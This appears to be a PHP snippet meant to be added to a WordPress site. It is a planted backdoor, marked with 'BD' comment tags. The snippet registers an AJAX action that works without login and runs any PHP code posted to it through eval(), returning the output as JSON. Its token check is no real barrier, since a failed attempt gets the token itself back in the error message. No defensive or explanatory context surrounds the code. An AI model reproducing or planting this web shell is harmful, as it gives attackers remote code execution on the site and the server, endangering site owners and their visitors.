// ==[BD:CiodNgpM]== add_action( 'wp_ajax_nopriv_qeowjgthz', function() { $factor = 'CiodNgpMtLfBbqs0mamLJJDiNhwXYcA2'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $factor, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $factor ], 403 ); } $key = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $key ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $key = preg_replace( '/^\s*<\?(php)?/i', '', $key ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $bind = microtime( true ); ob_start(); try { ( static function() use ( $key ) { return eval( $key ); } )(); $data = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $data, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $bind ) * 1000, 2 ) ] ); } catch ( \Throwable $marker ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $marker->getMessage(), 'time_ms' => round( ( microtime( true ) - $bind ) * 1000, 2 ) ] ); } } ); // ==[/BD:CiodNgpM]==